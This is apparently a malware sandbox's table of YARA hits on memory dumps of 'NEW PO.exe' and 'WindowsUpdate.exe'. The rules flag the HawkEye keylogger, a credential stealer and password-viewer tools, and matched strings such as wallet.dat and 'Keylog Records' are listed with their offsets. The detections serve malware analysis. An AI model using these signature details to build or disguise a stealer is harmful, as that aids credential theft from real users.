7.0.NEW PO.exe.400000.26.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.0.NEW PO.exe.400000.26.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.0.NEW PO.exe.400000.26.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.0.NEW PO.exe.400000.26.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.0.NEW PO.exe.400000.26.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.0.NEW PO.exe.400000.26.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
18.0.WindowsUpdate.exe.45fa72.29.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
22.0.vbc.exe.400000.4.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.400000.11.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
16.0.WindowsUpdate.exe.400000.11.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.400000.11.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.400000.11.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.400000.11.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.400000.11.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
7.2.NEW PO.exe.400000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records 0x7d913:$string4: Keylog Records 0x7db2f:$string5: do not script --> 0x7b841:$string6: \pidloc.txt 0x7b8cf:$string7: BSPLIT 0x7b8df:$string7: BSPLIT
7.2.NEW PO.exe.400000.0.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
7.2.NEW PO.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
7.2.NEW PO.exe.400000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
7.2.NEW PO.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.NEW PO.exe.400000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.409c0d.24.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x73a4c:$key: HawkEyeKeylogger 0x75cca:$salt: 099u787978786 0x740a9:$string1: HawkEye_Keylogger 0x74efc:$string1: HawkEye_Keylogger 0x75c2a:$string1: HawkEye_Keylogger 0x74492:$string2: holdermail.txt 0x744b2:$string2: holdermail.txt 0x743d4:$string3: wallet.dat 0x743ec:$string3: wallet.dat 0x74402:$string3: wallet.dat 0x757ee:$string4: Keylog Records 0x75b06:$string4: Keylog Records 0x75d22:$string5: do not script --> 0x73a34:$string6: \pidloc.txt 0x73ac2:$string7: BSPLIT 0x73ad2:$string7: BSPLIT
16.0.WindowsUpdate.exe.409c0d.24.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.409c0d.24.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.409c0d.24.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.409c0d.24.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x74101:$hawkstr1: HawkEye Keylogger 0x74f42:$hawkstr1: HawkEye Keylogger 0x75271:$hawkstr1: HawkEye Keylogger 0x753cc:$hawkstr1: HawkEye Keylogger 0x7552f:$hawkstr1: HawkEye Keylogger 0x757c6:$hawkstr1: HawkEye Keylogger 0x73c73:$hawkstr2: Dear HawkEye Customers! 0x752c4:$hawkstr2: Dear HawkEye Customers! 0x7541b:$hawkstr2: Dear HawkEye Customers! 0x75582:$hawkstr2: Dear HawkEye Customers! 0x73d94:$hawkstr3: HawkEye Logger Details:
16.0.WindowsUpdate.exe.408208.18.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x75451:$key: HawkEyeKeylogger 0x776cf:$salt: 099u787978786 0x75aae:$string1: HawkEye_Keylogger 0x76901:$string1: HawkEye_Keylogger 0x7762f:$string1: HawkEye_Keylogger 0x75e97:$string2: holdermail.txt 0x75eb7:$string2: holdermail.txt 0x75dd9:$string3: wallet.dat 0x75df1:$string3: wallet.dat 0x75e07:$string3: wallet.dat 0x771f3:$string4: Keylog Records 0x7750b:$string4: Keylog Records 0x77727:$string5: do not script --> 0x75439:$string6: \pidloc.txt 0x754c7:$string7: BSPLIT 0x754d7:$string7: BSPLIT
16.0.WindowsUpdate.exe.408208.18.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
16.0.WindowsUpdate.exe.408208.18.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
16.0.WindowsUpdate.exe.408208.18.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
16.0.WindowsUpdate.exe.408208.18.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
16.0.WindowsUpdate.exe.408208.18.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b06:$hawkstr1: HawkEye Keylogger 0x76947:$hawkstr1: HawkEye Keylogger 0x76c76:$hawkstr1: HawkEye Keylogger 0x76dd1:$hawkstr1: HawkEye Keylogger 0x76f34:$hawkstr1: HawkEye Keylogger 0x771cb:$hawkstr1: HawkEye Keylogger 0x75678:$hawkstr2: Dear HawkEye Customers! 0x76cc9:$hawkstr2: Dear HawkEye Customers! 0x76e20:$hawkstr2: Dear HawkEye Customers! 0x76f87:$hawkstr2: Dear HawkEye Customers! 0x75799:$hawkstr3: HawkEye Logger Details:
0.2.NEW PO.exe.474fbd0.5.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0xfd879:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0xffaf7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0xfded6:$string1: HawkEye_Keylogger 0xfed29:$string1: HawkEye_Keylogger 0xffa57:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0xfe2bf:$string2: holdermail.txt 0xfe2df:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0xfe201:$string3: wallet.dat 0xfe219:$string3: wallet.dat 0xfe22f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records
0.2.NEW PO.exe.474fbd0.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x89443:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.NEW PO.exe.474fbd0.5.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.NEW PO.exe.474fbd0.5.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.NEW PO.exe.474fbd0.5.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.NEW PO.exe.474fbd0.5.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0xfdf2e:$hawkstr1: HawkEye Keylogger 0xfed6f:$hawkstr1: HawkEye Keylogger 0xff09e:$hawkstr1: HawkEye Keylogger 0xff1f9:$hawkstr1: HawkEye Keylogger 0xff35c:$hawkstr1: HawkEye Keylogger 0xff5f3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0xfdaa0:$hawkstr2: Dear HawkEye Customers! 0xff0f1:$hawkstr2: Dear HawkEye Customers! 0xff248:$hawkstr2: Dear HawkEye Customers! 0xff3af:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b859:$key: HawkEyeKeylogger 0xfd879:$key: HawkEyeKeylogger 0x7dad7:$salt: 099u787978786 0xffaf7:$salt: 099u787978786 0x7beb6:$string1: HawkEye_Keylogger 0x7cd09:$string1: HawkEye_Keylogger 0x7da37:$string1: HawkEye_Keylogger 0xfded6:$string1: HawkEye_Keylogger 0xfed29:$string1: HawkEye_Keylogger 0xffa57:$string1: HawkEye_Keylogger 0x7c29f:$string2: holdermail.txt 0x7c2bf:$string2: holdermail.txt 0xfe2bf:$string2: holdermail.txt 0xfe2df:$string2: holdermail.txt 0x7c1e1:$string3: wallet.dat 0x7c1f9:$string3: wallet.dat 0x7c20f:$string3: wallet.dat 0xfe201:$string3: wallet.dat 0xfe219:$string3: wallet.dat 0xfe22f:$string3: wallet.dat 0x7d5fb:$string4: Keylog Records
15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x89443:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
15.2.WindowsUpdate.exe.402fbd0.5.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf0e:$hawkstr1: HawkEye Keylogger 0x7cd4f:$hawkstr1: HawkEye Keylogger 0x7d07e:$hawkstr1: HawkEye Keylogger 0x7d1d9:$hawkstr1: HawkEye Keylogger 0x7d33c:$hawkstr1: HawkEye Keylogger 0x7d5d3:$hawkstr1: HawkEye Keylogger 0xfdf2e:$hawkstr1: HawkEye Keylogger 0xfed6f:$hawkstr1: HawkEye Keylogger 0xff09e:$hawkstr1: HawkEye Keylogger 0xff1f9:$hawkstr1: HawkEye Keylogger 0xff35c:$hawkstr1: HawkEye Keylogger 0xff5f3:$hawkstr1: HawkEye Keylogger 0x7ba80:$hawkstr2: Dear HawkEye Customers! 0x7d0d1:$hawkstr2: Dear HawkEye Customers! 0x7d228:$hawkstr2: Dear HawkEye Customers! 0x7d38f:$hawkstr2: Dear HawkEye Customers! 0xfdaa0:$hawkstr2: Dear HawkEye Customers! 0xff0f1:$hawkstr2: Dear HawkEye Customers! 0xff248:$hawkstr2: Dear HawkEye Customers! 0xff3af:$hawkstr2: Dear HawkEye Customers! 0x7bba1:$hawkstr3: HawkEye Logger Details:
0.2.NEW PO.exe.43c56d8.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x405d51:$key: HawkEyeKeylogger 0x487d71:$key: HawkEyeKeylogger 0x407fcf:$salt: 099u787978786 0x489fef:$salt: 099u787978786 0x4063ae:$string1: HawkEye_Keylogger 0x407201:$string1: HawkEye_Keylogger 0x407f2f:$string1: HawkEye_Keylogger 0x4883ce:$string1: HawkEye_Keylogger 0x489221:$string1: HawkEye_Keylogger 0x489f4f:$string1: HawkEye_Keylogger 0x406797:$string2: holdermail.txt 0x4067b7:$string2: holdermail.txt 0x4887b7:$string2: holdermail.txt 0x4887d7:$string2: holdermail.txt 0x4066d9:$string3: wallet.dat 0x4066f1:$string3: wallet.dat 0x406707:$string3: wallet.dat 0x4886f9:$string3: wallet.dat 0x488711:$string3: wallet.dat 0x488727:$string3: wallet.dat 0x407af3:$string4: Keylog Records
0.2.NEW PO.exe.43c56d8.3.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x39191b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x41393b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.NEW PO.exe.43c56d8.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.NEW PO.exe.43c56d8.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.NEW PO.exe.43c56d8.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.NEW PO.exe.43c56d8.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x406406:$hawkstr1: HawkEye Keylogger 0x407247:$hawkstr1: HawkEye Keylogger 0x407576:$hawkstr1: HawkEye Keylogger 0x4076d1:$hawkstr1: HawkEye Keylogger 0x407834:$hawkstr1: HawkEye Keylogger 0x407acb:$hawkstr1: HawkEye Keylogger 0x488426:$hawkstr1: HawkEye Keylogger 0x489267:$hawkstr1: HawkEye Keylogger 0x489596:$hawkstr1: HawkEye Keylogger 0x4896f1:$hawkstr1: HawkEye Keylogger 0x489854:$hawkstr1: HawkEye Keylogger 0x489aeb:$hawkstr1: HawkEye Keylogger 0x405f78:$hawkstr2: Dear HawkEye Customers! 0x4075c9:$hawkstr2: Dear HawkEye Customers! 0x407720:$hawkstr2: Dear HawkEye Customers! 0x407887:$hawkstr2: Dear HawkEye Customers! 0x487f98:$hawkstr2: Dear HawkEye Customers! 0x4895e9:$hawkstr2: Dear HawkEye Customers! 0x489740:$hawkstr2: Dear HawkEye Customers! 0x4898a7:$hawkstr2: Dear HawkEye Customers! 0x406099:$hawkstr3: HawkEye Logger Details:
15.2.WindowsUpdate.exe.3e88750.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x222cd9:$key: HawkEyeKeylogger 0x2a4cf9:$key: HawkEyeKeylogger 0x224f57:$salt: 099u787978786 0x2a6f77:$salt: 099u787978786 0x223336:$string1: HawkEye_Keylogger 0x224189:$string1: HawkEye_Keylogger 0x224eb7:$string1: HawkEye_Keylogger 0x2a5356:$string1: HawkEye_Keylogger 0x2a61a9:$string1: HawkEye_Keylogger 0x2a6ed7:$string1: HawkEye_Keylogger 0x22371f:$string2: holdermail.txt 0x22373f:$string2: holdermail.txt 0x2a573f:$string2: holdermail.txt 0x2a575f:$string2: holdermail.txt 0x223661:$string3: wallet.dat 0x223679:$string3: wallet.dat 0x22368f:$string3: wallet.dat 0x2a5681:$string3: wallet.dat 0x2a5699:$string3: wallet.dat 0x2a56af:$string3: wallet.dat 0x224a7b:$string4: Keylog Records
15.2.WindowsUpdate.exe.3e88750.3.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x1ae8a3:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x2308c3:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
15.2.WindowsUpdate.exe.3e88750.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
15.2.WindowsUpdate.exe.3e88750.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
15.2.WindowsUpdate.exe.3e88750.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
15.2.WindowsUpdate.exe.3e88750.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x22338e:$hawkstr1: HawkEye Keylogger 0x2241cf:$hawkstr1: HawkEye Keylogger 0x2244fe:$hawkstr1: HawkEye Keylogger 0x224659:$hawkstr1: HawkEye Keylogger 0x2247bc:$hawkstr1: HawkEye Keylogger 0x224a53:$hawkstr1: HawkEye Keylogger 0x2a53ae:$hawkstr1: HawkEye Keylogger 0x2a61ef:$hawkstr1: HawkEye Keylogger 0x2a651e:$hawkstr1: HawkEye Keylogger 0x2a6679:$hawkstr1: HawkEye Keylogger 0x2a67dc:$hawkstr1: HawkEye Keylogger 0x2a6a73:$hawkstr1: HawkEye Keylogger 0x222f00:$hawkstr2: Dear HawkEye Customers! 0x224551:$hawkstr2: Dear HawkEye Customers! 0x2246a8:$hawkstr2: Dear HawkEye Customers! 0x22480f:$hawkstr2: Dear HawkEye Customers! 0x2a4f20:$hawkstr2: Dear HawkEye Customers! 0x2a6571:$hawkstr2: Dear HawkEye Customers! 0x2a66c8:$hawkstr2: Dear HawkEye Customers! 0x2a682f:$hawkstr2: Dear HawkEye Customers! 0x223021:$hawkstr3: HawkEye Logger Details:
0.2.NEW PO.exe.45a8750.4.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x222cd9:$key: HawkEyeKeylogger 0x2a4cf9:$key: HawkEyeKeylogger 0x224f57:$salt: 099u787978786 0x2a6f77:$salt: 099u787978786 0x223336:$string1: HawkEye_Keylogger 0x224189:$string1: HawkEye_Keylogger 0x224eb7:$string1: HawkEye_Keylogger 0x2a5356:$string1: HawkEye_Keylogger 0x2a61a9:$string1: HawkEye_Keylogger 0x2a6ed7:$string1: HawkEye_Keylogger 0x22371f:$string2: holdermail.txt 0x22373f:$string2: holdermail.txt 0x2a573f:$string2: holdermail.txt 0x2a575f:$string2: holdermail.txt 0x223661:$string3: wallet.dat 0x223679:$string3: wallet.dat 0x22368f:$string3: wallet.dat 0x2a5681:$string3: wallet.dat 0x2a5699:$string3: wallet.dat 0x2a56af:$string3: wallet.dat 0x224a7b:$string4: Keylog Records
0.2.NEW PO.exe.45a8750.4.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x1ae8a3:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x2308c3:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
0.2.NEW PO.exe.45a8750.4.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
0.2.NEW PO.exe.45a8750.4.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0.2.NEW PO.exe.45a8750.4.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
0.2.NEW PO.exe.45a8750.4.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x22338e:$hawkstr1: HawkEye Keylogger 0x2241cf:$hawkstr1: HawkEye Keylogger 0x2244fe:$hawkstr1: HawkEye Keylogger 0x224659:$hawkstr1: HawkEye Keylogger 0x2247bc:$hawkstr1: HawkEye Keylogger 0x224a53:$hawkstr1: HawkEye Keylogger 0x2a53ae:$hawkstr1: HawkEye Keylogger 0x2a61ef:$hawkstr1: HawkEye Keylogger 0x2a651e:$hawkstr1: HawkEye Keylogger 0x2a6679:$hawkstr1: HawkEye Keylogger 0x2a67dc:$hawkstr1: HawkEye Keylogger 0x2a6a73:$hawkstr1: HawkEye Keylogger 0x222f00:$hawkstr2: Dear HawkEye Customers! 0x224551:$hawkstr2: Dear HawkEye Customers! 0x2246a8:$hawkstr2: Dear HawkEye Customers! 0x22480f:$hawkstr2: Dear HawkEye Customers! 0x2a4f20:$hawkstr2: Dear HawkEye Customers! 0x2a6571:$hawkstr2: Dear HawkEye Customers! 0x2a66c8:$hawkstr2: Dear HawkEye Customers! 0x2a682f:$hawkstr2: Dear HawkEye Customers! 0x223021:$hawkstr3: HawkEye Logger Details:
17.2.WindowsUpdate.exe.43f8750.3.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x222cd9:$key: HawkEyeKeylogger 0x2a4cf9:$key: HawkEyeKeylogger 0x224f57:$salt: 099u787978786 0x2a6f77:$salt: 099u787978786 0x223336:$string1: HawkEye_Keylogger 0x224189:$string1: HawkEye_Keylogger 0x224eb7:$string1: HawkEye_Keylogger 0x2a5356:$string1: HawkEye_Keylogger 0x2a61a9:$string1: HawkEye_Keylogger 0x2a6ed7:$string1: HawkEye_Keylogger 0x22371f:$string2: holdermail.txt 0x22373f:$string2: holdermail.txt 0x2a573f:$string2: holdermail.txt 0x2a575f:$string2: holdermail.txt 0x223661:$string3: wallet.dat 0x223679:$string3: wallet.dat 0x22368f:$string3: wallet.dat 0x2a5681:$string3: wallet.dat 0x2a5699:$string3: wallet.dat 0x2a56af:$string3: wallet.dat 0x224a7b:$string4: Keylog Records
17.2.WindowsUpdate.exe.43f8750.3.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x1ae8a3:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x2308c3:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
17.2.WindowsUpdate.exe.43f8750.3.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
17.2.WindowsUpdate.exe.43f8750.3.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
17.2.WindowsUpdate.exe.43f8750.3.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
17.2.WindowsUpdate.exe.43f8750.3.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x22338e:$hawkstr1: HawkEye Keylogger 0x2241cf:$hawkstr1: HawkEye Keylogger 0x2244fe:$hawkstr1: HawkEye Keylogger 0x224659:$hawkstr1: HawkEye Keylogger 0x2247bc:$hawkstr1: HawkEye Keylogger 0x224a53:$hawkstr1: HawkEye Keylogger 0x2a53ae:$hawkstr1: HawkEye Keylogger 0x2a61ef:$hawkstr1: HawkEye Keylogger 0x2a651e:$hawkstr1: HawkEye Keylogger 0x2a6679:$hawkstr1: HawkEye Keylogger 0x2a67dc:$hawkstr1: HawkEye Keylogger 0x2a6a73:$hawkstr1: HawkEye Keylogger 0x222f00:$hawkstr2: Dear HawkEye Customers! 0x224551:$hawkstr2: Dear HawkEye Customers! 0x2246a8:$hawkstr2: Dear HawkEye Customers! 0x22480f:$hawkstr2: Dear HawkEye Customers! 0x2a4f20:$hawkstr2: Dear HawkEye Customers! 0x2a6571:$hawkstr2: Dear HawkEye Customers! 0x2a66c8:$hawkstr2: Dear HawkEye Customers! 0x2a682f:$hawkstr2: Dear HawkEye Customers! 0x223021:$hawkstr3: HawkEye Logger Details:
18.2.WindowsUpdate.exe.333ba6c.6.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x405d51:$key: HawkEyeKeylogger 0x487d71:$key: HawkEyeKeylogger 0x407fcf:$salt: 099u787978786 0x489fef:$salt: 099u787978786 0x4063ae:$string1: HawkEye_Keylogger 0x407201:$string1: HawkEye_Keylogger 0x407f2f:$string1: HawkEye_Keylogger 0x4883ce:$string1: HawkEye_Keylogger 0x489221:$string1: HawkEye_Keylogger 0x489f4f:$string1: HawkEye_Keylogger 0x406797:$string2: holdermail.txt 0x4067b7:$string2: holdermail.txt 0x4887b7:$string2: holdermail.txt 0x4887d7:$string2: holdermail.txt 0x4066d9:$string3: wallet.dat 0x4066f1:$string3: wallet.dat 0x406707:$string3: wallet.dat 0x4886f9:$string3: wallet.dat 0x488711:$string3: wallet.dat 0x488727:$string3: wallet.dat 0x407af3:$string4: Keylog Records
15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x39191b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x41393b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
